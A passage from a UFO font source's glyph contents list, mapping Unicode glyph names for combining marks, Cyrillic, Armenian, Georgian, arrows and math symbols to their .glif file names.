<key>uni0322</key> <string>uni0322.glif</string> <key>uni0324</key> <string>uni0324.glif</string> <key>uni0325</key> <string>uni0325.glif</string> <key>uni0326</key> <string>uni0326.glif</string> <key>uni0327</key> <string>uni0327.glif</string> <key>uni0328</key> <string>uni0328.glif</string> <key>uni0329</key> <string>uni0329.glif</string> <key>uni032A</key> <string>uni032A_.glif</string> <key>uni032B</key> <string>uni032B_.glif</string> <key>uni032C</key> <string>uni032C_.glif</string> <key>uni032D</key> <string>uni032D_.glif</string> <key>uni032E</key> <string>uni032E_.glif</string> <key>uni032F</key> <string>uni032F_.glif</string> <key>uni0330</key> <string>uni0330.glif</string> <key>uni0331</key> <string>uni0331.glif</string> <key>uni0332</key> <string>uni0332.glif</string> <key>uni0333</key> <string>uni0333.glif</string> <key>uni0334</key> <string>uni0334.glif</string> <key>uni0335</key> <string>uni0335.glif</string> <key>uni0336</key> <string>uni0336.glif</string> <key>uni0337</key> <string>uni0337.glif</string> <key>uni0338</key> <string>uni0338.glif</string> <key>uni0339</key> <string>uni0339.glif</string> <key>uni033A</key> <string>uni033A_.glif</string> <key>uni033B</key> <string>uni033B_.glif</string> <key>uni033C</key> <string>uni033C_.glif</string> <key>uni033D</key> <string>uni033D_.glif</string> <key>uni033E</key> <string>uni033E_.glif</string> <key>uni033F</key> <string>uni033F_.glif</string> <key>uni0358</key> <string>uni0358.glif</string> <key>uni0361</key> <string>uni0361.glif</string> <key>uni0394</key> <string>uni0394.glif</string> <key>uni03A9</key> <string>uni03A_9.glif</string> <key>uni03BC</key> <string>uni03B_C_.glif</string> <key>uni03C2</key> <string>uni03C_2.glif</string> <key>uni03F4</key> <string>uni03F_4.glif</string> <key>uni0400</key> <string>uni0400.glif</string> <key>uni0401</key> <string>uni0401.glif</string> <key>uni0402</key> <string>uni0402.glif</string> <key>uni0403</key> <string>uni0403.glif</string> <key>uni0404</key> <string>uni0404.glif</string> <key>uni0405</key> <string>uni0405.glif</string> <key>uni0406</key> <string>uni0406.glif</string> <key>uni0407</key> <string>uni0407.glif</string> <key>uni0408</key> <string>uni0408.glif</string> <key>uni0409</key> <string>uni0409.glif</string> <key>uni040A</key> <string>uni040A_.glif</string> <key>uni040B</key> <string>uni040B_.glif</string> <key>uni040C</key> <string>uni040C_.glif</string> <key>uni040D</key> <string>uni040D_.glif</string> <key>uni040E</key> <string>uni040E_.glif</string> <key>uni040F</key> <string>uni040F_.glif</string> <key>uni0410</key> <string>uni0410.glif</string> <key>uni0411</key> <string>uni0411.glif</string> <key>uni0412</key> <string>uni0412.glif</string> <key>uni0413</key> <string>uni0413.glif</string> <key>uni0414</key> <string>uni0414.glif</string> <key>uni0415</key> <string>uni0415.glif</string> <key>uni0416</key> <string>uni0416.glif</string> <key>uni0417</key> <string>uni0417.glif</string> <key>uni0418</key> <string>uni0418.glif</string> <key>uni0419</key> <string>uni0419.glif</string> <key>uni041A</key> <string>uni041A_.glif</string> <key>uni041B</key> <string>uni041B_.glif</string> <key>uni041C</key> <string>uni041C_.glif</string> <key>uni041D</key> <string>uni041D_.glif</string> <key>uni041E</key> <string>uni041E_.glif</string> <key>uni041F</key> <string>uni041F_.glif</string> <key>uni0420</key> <string>uni0420.glif</string> <key>uni0421</key> <string>uni0421.glif</string> <key>uni0422</key> <string>uni0422.glif</string> <key>uni0423</key> <string>uni0423.glif</string> <key>uni0424</key> <string>uni0424.glif</string> <key>uni0425</key> <string>uni0425.glif</string> <key>uni0426</key> <string>uni0426.glif</string> <key>uni0427</key> <string>uni0427.glif</string> <key>uni0428</key> <string>uni0428.glif</string> <key>uni0429</key> <string>uni0429.glif</string> <key>uni042A</key> <string>uni042A_.glif</string> <key>uni042B</key> <string>uni042B_.glif</string> <key>uni042C</key> <string>uni042C_.glif</string> <key>uni042D</key> <string>uni042D_.glif</string> <key>uni042E</key> <string>uni042E_.glif</string> <key>uni042F</key> <string>uni042F_.glif</string> <key>uni0430</key> <string>uni0430.glif</string> <key>uni0431</key> <string>uni0431.glif</string> <key>uni0432</key> <string>uni0432.glif</string> <key>uni0433</key> <string>uni0433.glif</string> <key>uni0434</key> <string>uni0434.glif</string> <key>uni0435</key> <string>uni0435.glif</string> <key>uni0436</key> <string>uni0436.glif</string> <key>uni0437</key> <string>uni0437.glif</string> <key>uni0438</key> <string>uni0438.glif</string> <key>uni0439</key> <string>uni0439.glif</string> <key>uni043A</key> <string>uni043A_.glif</string> <key>uni043B</key> <string>uni043B_.glif</string> <key>uni043C</key> <string>uni043C_.glif</string> <key>uni043D</key> <string>uni043D_.glif</string> <key>uni043E</key> <string>uni043E_.glif</string> <key>uni043F</key> <string>uni043F_.glif</string> <key>uni0440</key> <string>uni0440.glif</string> <key>uni0441</key> <string>uni0441.glif</string> <key>uni0442</key> <string>uni0442.glif</string> <key>uni0443</key> <string>uni0443.glif</string> <key>uni0444</key> <string>uni0444.glif</string> <key>uni0445</key> <string>uni0445.glif</string> <key>uni0446</key> <string>uni0446.glif</string> <key>uni0447</key> <string>uni0447.glif</string> <key>uni0448</key> <string>uni0448.glif</string> <key>uni0449</key> <string>uni0449.glif</string> <key>uni044A</key> <string>uni044A_.glif</string> <key>uni044B</key> <string>uni044B_.glif</string> <key>uni044C</key> <string>uni044C_.glif</string> <key>uni044D</key> <string>uni044D_.glif</string> <key>uni044E</key> <string>uni044E_.glif</string> <key>uni044F</key> <string>uni044F_.glif</string> <key>uni0450</key> <string>uni0450.glif</string> <key>uni0451</key> <string>uni0451.glif</string> <key>uni0452</key> <string>uni0452.glif</string> <key>uni0453</key> <string>uni0453.glif</string> <key>uni0454</key> <string>uni0454.glif</string> <key>uni0455</key> <string>uni0455.glif</string> <key>uni0456</key> <string>uni0456.glif</string> <key>uni0457</key> <string>uni0457.glif</string> <key>uni0458</key> <string>uni0458.glif</string> <key>uni0459</key> <string>uni0459.glif</string> <key>uni045A</key> <string>uni045A_.glif</string> <key>uni045B</key> <string>uni045B_.glif</string> <key>uni045C</key> <string>uni045C_.glif</string> <key>uni045D</key> <string>uni045D_.glif</string> <key>uni045E</key> <string>uni045E_.glif</string> <key>uni045F</key> <string>uni045F_.glif</string> <key>uni0462</key> <string>uni0462.glif</string> <key>uni0463</key> <string>uni0463.glif</string> <key>uni0472</key> <string>uni0472.glif</string> <key>uni0473</key> <string>uni0473.glif</string> <key>uni0490</key> <string>uni0490.glif</string> <key>uni0491</key> <string>uni0491.glif</string> <key>uni0492</key> <string>uni0492.glif</string> <key>uni0493</key> <string>uni0493.glif</string> <key>uni0494</key> <string>uni0494.glif</string> <key>uni0495</key> <string>uni0495.glif</string> <key>uni0496</key> <string>uni0496.glif</string> <key>uni0497</key> <string>uni0497.glif</string> <key>uni0498</key> <string>uni0498.glif</string> <key>uni0499</key> <string>uni0499.glif</string> <key>uni049A</key> <string>uni049A_.glif</string> <key>uni049B</key> <string>uni049B_.glif</string> <key>uni04A2</key> <string>uni04A_2.glif</string> <key>uni04A3</key> <string>uni04A_3.glif</string> <key>uni04A4</key> <string>uni04A_4.glif</string> <key>uni04A5</key> <string>uni04A_5.glif</string> <key>uni04AA</key> <string>uni04A_A_.glif</string> <key>uni04AB</key> <string>uni04A_B_.glif</string> <key>uni04AC</key> <string>uni04A_C_.glif</string> <key>uni04AD</key> <string>uni04A_D_.glif</string> <key>uni04AE</key> <string>uni04A_E_.glif</string> <key>uni04AF</key> <string>uni04A_F_.glif</string> <key>uni04B0</key> <string>uni04B_0.glif</string> <key>uni04B1</key> <string>uni04B_1.glif</string> <key>uni04B2</key> <string>uni04B_2.glif</string> <key>uni04B3</key> <string>uni04B_3.glif</string> <key>uni04BA</key> <string>uni04B_A_.glif</string> <key>uni04BB</key> <string>uni04B_B_.glif</string> <key>uni04C0</key> <string>uni04C_0.glif</string> <key>uni04C1</key> <string>uni04C_1.glif</string> <key>uni04C2</key> <string>uni04C_2.glif</string> <key>uni04C3</key> <string>uni04C_3.glif</string> <key>uni04C4</key> <string>uni04C_4.glif</string> <key>uni04C7</key> <string>uni04C_7.glif</string> <key>uni04C8</key> <string>uni04C_8.glif</string> <key>uni04CB</key> <string>uni04C_B_.glif</string> <key>uni04CC</key> <string>uni04C_C_.glif</string> <key>uni04CF</key> <string>uni04C_F_.glif</string> <key>uni04D0</key> <string>uni04D_0.glif</string> <key>uni04D1</key> <string>uni04D_1.glif</string> <key>uni04D2</key> <string>uni04D_2.glif</string> <key>uni04D3</key> <string>uni04D_3.glif</string> <key>uni04D4</key> <string>uni04D_4.glif</string> <key>uni04D5</key> <string>uni04D_5.glif</string> <key>uni04D6</key> <string>uni04D_6.glif</string> <key>uni04D7</key> <string>uni04D_7.glif</string> <key>uni04D8</key> <string>uni04D_8.glif</string> <key>uni04D9</key> <string>uni04D_9.glif</string> <key>uni04DA</key> <string>uni04D_A_.glif</string> <key>uni04DB</key> <string>uni04D_B_.glif</string> <key>uni04DC</key> <string>uni04D_C_.glif</string> <key>uni04DD</key> <string>uni04D_D_.glif</string> <key>uni04DE</key> <string>uni04D_E_.glif</string> <key>uni04DF</key> <string>uni04D_F_.glif</string> <key>uni04E0</key> <string>uni04E_0.glif</string> <key>uni04E1</key> <string>uni04E_1.glif</string> <key>uni04E2</key> <string>uni04E_2.glif</string> <key>uni04E3</key> <string>uni04E_3.glif</string> <key>uni04E4</key> <string>uni04E_4.glif</string> <key>uni04E5</key> <string>uni04E_5.glif</string> <key>uni04E6</key> <string>uni04E_6.glif</string> <key>uni04E7</key> <string>uni04E_7.glif</string> <key>uni04E8</key> <string>uni04E_8.glif</string> <key>uni04E9</key> <string>uni04E_9.glif</string> <key>uni04EA</key> <string>uni04E_A_.glif</string> <key>uni04EB</key> <string>uni04E_B_.glif</string> <key>uni04EC</key> <string>uni04E_C_.glif</string> <key>uni04ED</key> <string>uni04E_D_.glif</string> <key>uni04EE</key> <string>uni04E_E_.glif</string> <key>uni04EF</key> <string>uni04E_F_.glif</string> <key>uni04F0</key> <string>uni04F_0.glif</string> <key>uni04F1</key> <string>uni04F_1.glif</string> <key>uni04F2</key> <string>uni04F_2.glif</string> <key>uni04F3</key> <string>uni04F_3.glif</string> <key>uni04F4</key> <string>uni04F_4.glif</string> <key>uni04F5</key> <string>uni04F_5.glif</string> <key>uni04F6</key> <string>uni04F_6.glif</string> <key>uni04F7</key> <string>uni04F_7.glif</string> <key>uni04F8</key> <string>uni04F_8.glif</string> <key>uni04F9</key> <string>uni04F_9.glif</string> <key>uni0510</key> <string>uni0510.glif</string> <key>uni0511</key> <string>uni0511.glif</string> <key>uni051A</key> <string>uni051A_.glif</string> <key>uni051B</key> <string>uni051B_.glif</string> <key>uni051C</key> <string>uni051C_.glif</string> <key>uni051D</key> <string>uni051D_.glif</string> <key>uni0531</key> <string>uni0531.glif</string> <key>uni0532</key> <string>uni0532.glif</string> <key>uni0533</key> <string>uni0533.glif</string> <key>uni0534</key> <string>uni0534.glif</string> <key>uni0535</key> <string>uni0535.glif</string> <key>uni0536</key> <string>uni0536.glif</string> <key>uni0537</key> <string>uni0537.glif</string> <key>uni0538</key> <string>uni0538.glif</string> <key>uni0539</key> <string>uni0539.glif</string> <key>uni053A</key> <string>uni053A_.glif</string> <key>uni053B</key> <string>uni053B_.glif</string> <key>uni053C</key> <string>uni053C_.glif</string> <key>uni053D</key> <string>uni053D_.glif</string> <key>uni053E</key> <string>uni053E_.glif</string> <key>uni053F</key> <string>uni053F_.glif</string> <key>uni0540</key> <string>uni0540.glif</string> <key>uni0541</key> <string>uni0541.glif</string> <key>uni0542</key> <string>uni0542.glif</string> <key>uni0543</key> <string>uni0543.glif</string> <key>uni0544</key> <string>uni0544.glif</string> <key>uni0545</key> <string>uni0545.glif</string> <key>uni0546</key> <string>uni0546.glif</string> <key>uni0547</key> <string>uni0547.glif</string> <key>uni0548</key> <string>uni0548.glif</string> <key>uni0549</key> <string>uni0549.glif</string> <key>uni054A</key> <string>uni054A_.glif</string> <key>uni054B</key> <string>uni054B_.glif</string> <key>uni054C</key> <string>uni054C_.glif</string> <key>uni054D</key> <string>uni054D_.glif</string> <key>uni054E</key> <string>uni054E_.glif</string> <key>uni054F</key> <string>uni054F_.glif</string> <key>uni0550</key> <string>uni0550.glif</string> <key>uni0551</key> <string>uni0551.glif</string> <key>uni0552</key> <string>uni0552.glif</string> <key>uni0553</key> <string>uni0553.glif</string> <key>uni0554</key> <string>uni0554.glif</string> <key>uni0555</key> <string>uni0555.glif</string> <key>uni0556</key> <string>uni0556.glif</string> <key>uni0559</key> <string>uni0559.glif</string> <key>uni055A</key> <string>uni055A_.glif</string> <key>uni055B</key> <string>uni055B_.glif</string> <key>uni055C</key> <string>uni055C_.glif</string> <key>uni055D</key> <string>uni055D_.glif</string> <key>uni055E</key> <string>uni055E_.glif</string> <key>uni055F</key> <string>uni055F_.glif</string> <key>uni0561</key> <string>uni0561.glif</string> <key>uni0562</key> <string>uni0562.glif</string> <key>uni0563</key> <string>uni0563.glif</string> <key>uni0564</key> <string>uni0564.glif</string> <key>uni0565</key> <string>uni0565.glif</string> <key>uni0566</key> <string>uni0566.glif</string> <key>uni0567</key> <string>uni0567.glif</string> <key>uni0568</key> <string>uni0568.glif</string> <key>uni0569</key> <string>uni0569.glif</string> <key>uni056A</key> <string>uni056A_.glif</string> <key>uni056B</key> <string>uni056B_.glif</string> <key>uni056C</key> <string>uni056C_.glif</string> <key>uni056D</key> <string>uni056D_.glif</string> <key>uni056E</key> <string>uni056E_.glif</string> <key>uni056F</key> <string>uni056F_.glif</string> <key>uni0570</key> <string>uni0570.glif</string> <key>uni0571</key> <string>uni0571.glif</string> <key>uni0572</key> <string>uni0572.glif</string> <key>uni0573</key> <string>uni0573.glif</string> <key>uni0574</key> <string>uni0574.glif</string> <key>uni0575</key> <string>uni0575.glif</string> <key>uni0576</key> <string>uni0576.glif</string> <key>uni0577</key> <string>uni0577.glif</string> <key>uni0578</key> <string>uni0578.glif</string> <key>uni0579</key> <string>uni0579.glif</string> <key>uni057A</key> <string>uni057A_.glif</string> <key>uni057B</key> <string>uni057B_.glif</string> <key>uni057C</key> <string>uni057C_.glif</string> <key>uni057D</key> <string>uni057D_.glif</string> <key>uni057E</key> <string>uni057E_.glif</string> <key>uni057F</key> <string>uni057F_.glif</string> <key>uni0580</key> <string>uni0580.glif</string> <key>uni0581</key> <string>uni0581.glif</string> <key>uni0582</key> <string>uni0582.glif</string> <key>uni0583</key> <string>uni0583.glif</string> <key>uni0584</key> <string>uni0584.glif</string> <key>uni0585</key> <string>uni0585.glif</string> <key>uni0586</key> <string>uni0586.glif</string> <key>uni0587</key> <string>uni0587.glif</string> <key>uni0589</key> <string>uni0589.glif</string> <key>uni058A</key> <string>uni058A_.glif</string> <key>uni0E3F</key> <string>uni0E_3F_.glif</string> <key>uni10D0</key> <string>uni10D_0.glif</string> <key>uni10D1</key> <string>uni10D_1.glif</string> <key>uni10D2</key> <string>uni10D_2.glif</string> <key>uni10D3</key> <string>uni10D_3.glif</string> <key>uni10D4</key> <string>uni10D_4.glif</string> <key>uni10D5</key> <string>uni10D_5.glif</string> <key>uni10D6</key> <string>uni10D_6.glif</string> <key>uni10D7</key> <string>uni10D_7.glif</string> <key>uni10D8</key> <string>uni10D_8.glif</string> <key>uni10D9</key> <string>uni10D_9.glif</string> <key>uni10DA</key> <string>uni10D_A_.glif</string> <key>uni10DB</key> <string>uni10D_B_.glif</string> <key>uni10DC</key> <string>uni10D_C_.glif</string> <key>uni10DD</key> <string>uni10D_D_.glif</string> <key>uni10DE</key> <string>uni10D_E_.glif</string> <key>uni10DF</key> <string>uni10D_F_.glif</string> <key>uni10E0</key> <string>uni10E_0.glif</string> <key>uni10E1</key> <string>uni10E_1.glif</string> <key>uni10E2</key> <string>uni10E_2.glif</string> <key>uni10E3</key> <string>uni10E_3.glif</string> <key>uni10E4</key> <string>uni10E_4.glif</string> <key>uni10E5</key> <string>uni10E_5.glif</string> <key>uni10E6</key> <string>uni10E_6.glif</string> <key>uni10E7</key> <string>uni10E_7.glif</string> <key>uni10E8</key> <string>uni10E_8.glif</string> <key>uni10E9</key> <string>uni10E_9.glif</string> <key>uni10EA</key> <string>uni10E_A_.glif</string> <key>uni10EB</key> <string>uni10E_B_.glif</string> <key>uni10EC</key> <string>uni10E_C_.glif</string> <key>uni10ED</key> <string>uni10E_D_.glif</string> <key>uni10EE</key> <string>uni10E_E_.glif</string> <key>uni10EF</key> <string>uni10E_F_.glif</string> <key>uni10F0</key> <string>uni10F_0.glif</string> <key>uni10F1</key> <string>uni10F_1.glif</string> <key>uni10F2</key> <string>uni10F_2.glif</string> <key>uni10F3</key> <string>uni10F_3.glif</string> <key>uni10F4</key> <string>uni10F_4.glif</string> <key>uni10F5</key> <string>uni10F_5.glif</string> <key>uni10F6</key> <string>uni10F_6.glif</string> <key>uni10F7</key> <string>uni10F_7.glif</string> <key>uni10F8</key> <string>uni10F_8.glif</string> <key>uni10F9</key> <string>uni10F_9.glif</string> <key>uni10FA</key> <string>uni10F_A_.glif</string> <key>uni10FB</key> <string>uni10F_B_.glif</string> <key>uni10FC</key> <string>uni10F_C_.glif</string> <key>uni1EBC</key> <string>uni1E_B_C_.glif</string> <key>uni1EBD</key> <string>uni1E_B_D_.glif</string> <key>uni1EF8</key> <string>uni1E_F_8.glif</string> <key>uni1EF9</key> <string>uni1E_F_9.glif</string> <key>uni2000</key> <string>uni2000.glif</string> <key>uni2001</key> <string>uni2001.glif</string> <key>uni2002</key> <string>uni2002.glif</string> <key>uni2003</key> <string>uni2003.glif</string> <key>uni2004</key> <string>uni2004.glif</string> <key>uni2005</key> <string>uni2005.glif</string> <key>uni2006</key> <string>uni2006.glif</string> <key>uni2007</key> <string>uni2007.glif</string> <key>uni2008</key> <string>uni2008.glif</string> <key>uni2009</key> <string>uni2009.glif</string> <key>uni200A</key> <string>uni200A_.glif</string> <key>uni2010</key> <string>uni2010.glif</string> <key>uni2011</key> <string>uni2011.glif</string> <key>uni2015</key> <string>uni2015.glif</string> <key>uni2016</key> <string>uni2016.glif</string> <key>uni201F</key> <string>uni201F_.glif</string> <key>uni2023</key> <string>uni2023.glif</string> <key>hyphenationpoint</key> <string>hyphenationpoint.glif</string> <key>uni202F</key> <string>uni202F_.glif</string> <key>uni2031</key> <string>uni2031.glif</string> <key>minute</key> <string>minute.glif</string> <key>second</key> <string>second.glif</string> <key>millisecond</key> <string>millisecond.glif</string> <key>uni2035</key> <string>uni2035.glif</string> <key>uni2036</key> <string>uni2036.glif</string> <key>uni2037</key> <string>uni2037.glif</string> <key>uni203D</key> <string>uni203D_.glif</string> <key>uni203E</key> <string>uni203E_.glif</string> <key>uni203F</key> <string>uni203F_.glif</string> <key>uni2045</key> <string>uni2045.glif</string> <key>uni2046</key> <string>uni2046.glif</string> <key>uni2047</key> <string>uni2047.glif</string> <key>uni2048</key> <string>uni2048.glif</string> <key>uni2049</key> <string>uni2049.glif</string> <key>uni204B</key> <string>uni204B_.glif</string> <key>uni205F</key> <string>uni205F_.glif</string> <key>uni2070</key> <string>uni2070.glif</string> <key>uni2074</key> <string>uni2074.glif</string> <key>uni2075</key> <string>uni2075.glif</string> <key>uni2076</key> <string>uni2076.glif</string> <key>uni2077</key> <string>uni2077.glif</string> <key>uni2078</key> <string>uni2078.glif</string> <key>uni2079</key> <string>uni2079.glif</string> <key>uni207A</key> <string>uni207A_.glif</string> <key>uni207B</key> <string>uni207B_.glif</string> <key>uni207C</key> <string>uni207C_.glif</string> <key>uni207D</key> <string>uni207D_.glif</string> <key>uni207E</key> <string>uni207E_.glif</string> <key>uni208A</key> <string>uni208A_.glif</string> <key>uni208B</key> <string>uni208B_.glif</string> <key>uni208C</key> <string>uni208C_.glif</string> <key>uni208D</key> <string>uni208D_.glif</string> <key>uni208E</key> <string>uni208E_.glif</string> <key>uni20A0</key> <string>uni20A_0.glif</string> <key>uni20A2</key> <string>uni20A_2.glif</string> <key>uni20A5</key> <string>uni20A_5.glif</string> <key>uni20A6</key> <string>uni20A_6.glif</string> <key>uni20A8</key> <string>uni20A_8.glif</string> <key>uni20A9</key> <string>uni20A_9.glif</string> <key>uni20AA</key> <string>uni20A_A_.glif</string> <key>uni20AD</key> <string>uni20A_D_.glif</string> <key>uni20AE</key> <string>uni20A_E_.glif</string> <key>uni20AF</key> <string>uni20A_F_.glif</string> <key>uni20B0</key> <string>uni20B_0.glif</string> <key>uni20B1</key> <string>uni20B_1.glif</string> <key>uni20B2</key> <string>uni20B_2.glif</string> <key>uni20B3</key> <string>uni20B_3.glif</string> <key>uni20B4</key> <string>uni20B_4.glif</string> <key>uni20B5</key> <string>uni20B_5.glif</string> <key>uni20B7</key> <string>uni20B_7.glif</string> <key>uni20B8</key> <string>uni20B_8.glif</string> <key>uni20B9</key> <string>uni20B_9.glif</string> <key>uni2116</key> <string>uni2116.glif</string> <key>uni2126</key> <string>uni2126.glif</string> <key>uni2150</key> <string>uni2150.glif</string> <key>uni2151</key> <string>uni2151.glif</string> <key>uni2153</key> <string>uni2153.glif</string> <key>uni2154</key> <string>uni2154.glif</string> <key>uni2155</key> <string>uni2155.glif</string> <key>uni2156</key> <string>uni2156.glif</string> <key>uni2157</key> <string>uni2157.glif</string> <key>uni2158</key> <string>uni2158.glif</string> <key>uni2159</key> <string>uni2159.glif</string> <key>uni215A</key> <string>uni215A_.glif</string> <key>uni215F</key> <string>uni215F_.glif</string> <key>uni2189</key> <string>uni2189.glif</string> <key>uni2196</key> <string>uni2196.glif</string> <key>uni2197</key> <string>uni2197.glif</string> <key>uni2198</key> <string>uni2198.glif</string> <key>uni2199</key> <string>uni2199.glif</string> <key>uni219A</key> <string>uni219A_.glif</string> <key>uni219B</key> <string>uni219B_.glif</string> <key>uni219C</key> <string>uni219C_.glif</string> <key>uni219D</key> <string>uni219D_.glif</string> <key>uni219E</key> <string>uni219E_.glif</string> <key>uni219F</key> <string>uni219F_.glif</string> <key>uni21A0</key> <string>uni21A_0.glif</string> <key>uni21A1</key> <string>uni21A_1.glif</string> <key>uni21A2</key> <string>uni21A_2.glif</string> <key>uni21A3</key> <string>uni21A_3.glif</string> <key>uni21A4</key> <string>uni21A_4.glif</string> <key>uni21A5</key> <string>uni21A_5.glif</string> <key>uni21A6</key> <string>uni21A_6.glif</string> <key>uni21A7</key> <string>uni21A_7.glif</string> <key>uni21A9</key> <string>uni21A_9.glif</string> <key>uni21AA</key> <string>uni21A_A_.glif</string> <key>uni21AB</key> <string>uni21A_B_.glif</string> <key>uni21AC</key> <string>uni21A_C_.glif</string> <key>uni21AD</key> <string>uni21A_D_.glif</string> <key>uni21AE</key> <string>uni21A_E_.glif</string> <key>uni21AF</key> <string>uni21A_F_.glif</string> <key>uni21B0</key> <string>uni21B_0.glif</string> <key>uni21B1</key> <string>uni21B_1.glif</string> <key>uni21B2</key> <string>uni21B_2.glif</string> <key>uni21B3</key> <string>uni21B_3.glif</string> <key>uni21B4</key> <string>uni21B_4.glif</string> <key>uni21B6</key> <string>uni21B_6.glif</string> <key>uni21B7</key> <string>uni21B_7.glif</string> <key>uni21B8</key> <string>uni21B_8.glif</string> <key>uni21B9</key> <string>uni21B_9.glif</string> <key>uni21BA</key> <string>uni21B_A_.glif</string> <key>uni21BB</key> <string>uni21B_B_.glif</string> <key>uni21BC</key> <string>uni21B_C_.glif</string> <key>uni21BD</key> <string>uni21B_D_.glif</string> <key>uni21BE</key> <string>uni21B_E_.glif</string> <key>uni21BF</key> <string>uni21B_F_.glif</string> <key>uni21C0</key> <string>uni21C_0.glif</string> <key>uni21C1</key> <string>uni21C_1.glif</string> <key>uni21C2</key> <string>uni21C_2.glif</string> <key>uni21C3</key> <string>uni21C_3.glif</string> <key>uni21C4</key> <string>uni21C_4.glif</string> <key>uni21C5</key> <string>uni21C_5.glif</string> <key>uni21C6</key> <string>uni21C_6.glif</string> <key>uni21C7</key> <string>uni21C_7.glif</string> <key>uni21C8</key> <string>uni21C_8.glif</string> <key>uni21C9</key> <string>uni21C_9.glif</string> <key>uni21CA</key> <string>uni21C_A_.glif</string> <key>uni21CB</key> <string>uni21C_B_.glif</string> <key>uni21CC</key> <string>uni21C_C_.glif</string> <key>uni21CD</key> <string>uni21C_D_.glif</string> <key>uni21CE</key> <string>uni21C_E_.glif</string> <key>uni21CF</key> <string>uni21C_F_.glif</string> <key>uni21D5</key> <string>uni21D_5.glif</string> <key>uni21D6</key> <string>uni21D_6.glif</string> <key>uni21D7</key> <string>uni21D_7.glif</string> <key>uni21D8</key> <string>uni21D_8.glif</string> <key>uni21D9</key> <string>uni21D_9.glif</string> <key>uni21DA</key> <string>uni21D_A_.glif</string> <key>uni21DB</key> <string>uni21D_B_.glif</string> <key>uni21DC</key> <string>uni21D_C_.glif</string> <key>uni21DD</key> <string>uni21D_D_.glif</string> <key>uni21E0</key> <string>uni21E_0.glif</string> <key>uni21E1</key> <string>uni21E_1.glif</string> <key>uni21E2</key> <string>uni21E_2.glif</string> <key>uni21E3</key> <string>uni21E_3.glif</string> <key>uni21E4</key> <string>uni21E_4.glif</string> <key>uni21E5</key> <string>uni21E_5.glif</string> <key>uni21E6</key> <string>uni21E_6.glif</string> <key>uni21E7</key> <string>uni21E_7.glif</string> <key>uni21E8</key> <string>uni21E_8.glif</string> <key>uni21E9</key> <string>uni21E_9.glif</string> <key>uni21EB</key> <string>uni21E_B_.glif</string> <key>uni21EC</key> <string>uni21E_C_.glif</string> <key>uni21ED</key> <string>uni21E_D_.glif</string> <key>uni21EE</key> <string>uni21E_E_.glif</string> <key>uni21EF</key> <string>uni21E_F_.glif</string> <key>uni21F0</key> <string>uni21F_0.glif</string> <key>uni21F1</key> <string>uni21F_1.glif</string> <key>uni21F2</key> <string>uni21F_2.glif</string> <key>uni21F3</key> <string>uni21F_3.glif</string> <key>uni21F4</key> <string>uni21F_4.glif</string> <key>uni21F5</key> <string>uni21F_5.glif</string> <key>uni21F6</key> <string>uni21F_6.glif</string> <key>uni21F7</key> <string>uni21F_7.glif</string> <key>uni21F8</key> <string>uni21F_8.glif</string> <key>uni21F9</key> <string>uni21F_9.glif</string> <key>uni21FA</key> <string>uni21F_A_.glif</string> <key>uni21FB</key> <string>uni21F_B_.glif</string> <key>uni21FC</key> <string>uni21F_C_.glif</string> <key>uni21FD</key> <string>uni21F_D_.glif</string> <key>uni21FE</key> <string>uni21F_E_.glif</string> <key>uni21FF</key> <string>uni21F_F_.glif</string> <key>uni2201</key> <string>uni2201.glif</string> <key>uni2204</key> <string>uni2204.glif</string> <key>uni2206</key> <string>uni2206.glif</string> <key>uni220A</key> <string>uni220A_.glif</string> <key>uni220C</key> <string>uni220C_.glif</string> <key>uni220D</key> <string>uni220D_.glif</string> <key>uni220E</key> <string>uni220E_.glif</string> <key>uni2210</key> <string>uni2210.glif</string> <key>uni2213</key> <string>uni2213.glif</string> <key>uni2218</key> <string>uni2218.glif</string> <key>uni221B</key> <string>uni221B_.glif</string> <key>uni221C</key> <string>uni221C_.glif</string> <key>uni2223</key> <string>uni2223.glif</string> <key>uni222C</key> <string>uni222C_.glif</string> <key>uni222D</key> <string>uni222D_.glif</string> <key>uni2235</key> <string>uni2235.glif</string> <key>uni2236</key> <string>uni2236.glif</string> <key>uni2237</key> <string>uni2237.glif</string> <key>uni2238</key> <string>uni2238.glif</string> <key>uni2239</key> <string>uni2239.glif</string> <key>uni223A</key> <string>uni223A_.glif</string> <key>uni223B</key> <string>uni223B_.glif</string> <key>uni223D</key> <string>uni223D_.glif</string> <key>uni2241</key> <string>uni2241.glif</string> <key>uni2242</key> <string>uni2242.glif</string> <key>uni2243</key> <string>uni2243.glif</string> <key>uni2244</key> <string>uni2244.glif</string> <key>uni2246</key> <string>uni2246.glif</string> <key>uni2247</key> <string>uni2247.glif</string> <key>uni2249</key> <string>uni2249.glif</string> <key>uni224A</key> <string>uni224A_.glif</string> <key>uni224B</key> <string>uni224B_.glif</string> <key>uni224C</key> <string>uni224C_.glif</string> <key>uni224D</key> <string>uni224D_.glif</string> <key>uni224E</key> <string>uni224E_.glif</string> <key>uni224F</key> <string>uni224F_.glif</string> <key>uni2250</key> <string>uni2250.glif</string> <key>uni2251</key> <string>uni2251.glif</string> <key>uni2252</key> <string>uni2252.glif</string> <key>uni2253</key> <string>uni2253.glif</string> <key>uni2254</key> <string>uni2254.glif</string> <key>uni2255</key> <string>uni2255.glif</string> <key>uni2256</key> <string>uni2256.glif</string> <key>uni2257</key> <string>uni2257.glif</string> <key>uni2258</key> <string>uni2258.glif</string> <key>uni2259</key> <string>uni2259.glif</string> <key>uni225A</key> <string>uni225A_.glif</string> <key>uni225B</key> <string>uni225B_.glif</string> <key>uni225C</key> <string>uni225C_.glif</string> <key>uni225D</key> <string>uni225D_.glif</string> <key>uni225E</key> <string>uni225E_.glif</string> <key>uni225F</key> <string>uni225F_.glif</string> <key>uni2262</key> <string>uni2262.glif</string> <key>uni2263</key> <string>uni2263.glif</string> <key>uni2266</key> <string>uni2266.glif</string> <key>uni2267</key> <string>uni2267.glif</string> <key>uni2268</key> <string>uni2268.glif</string> <key>uni2269</key> <string>uni2269.glif</string> <key>uni226D</key> <string>uni226D_.glif</string> <key>uni226E</key> <string>uni226E_.glif</string> <key>uni226F</key> <string>uni226F_.glif</string> <key>uni2270</key> <string>uni2270.glif</string> <key>uni2271</key> <string>uni2271.glif</string> <key>uni2272</key> <string>uni2272.glif</string> <key>uni2273</key> <string>uni2273.glif</string> <key>uni2274</key> <string>uni2274.glif</string> <key>uni2275</key> <string>uni2275.glif</string> <key>uni2276</key> <string>uni2276.glif</string> <key>uni2277</key> <string>uni2277.glif</string> <key>uni2278</key> <string>uni2278.glif</string> <key>uni2279</key> <string>uni2279.glif</string> <key>uni227A</key> <string>uni227A_.glif</string> <key>uni227B</key> 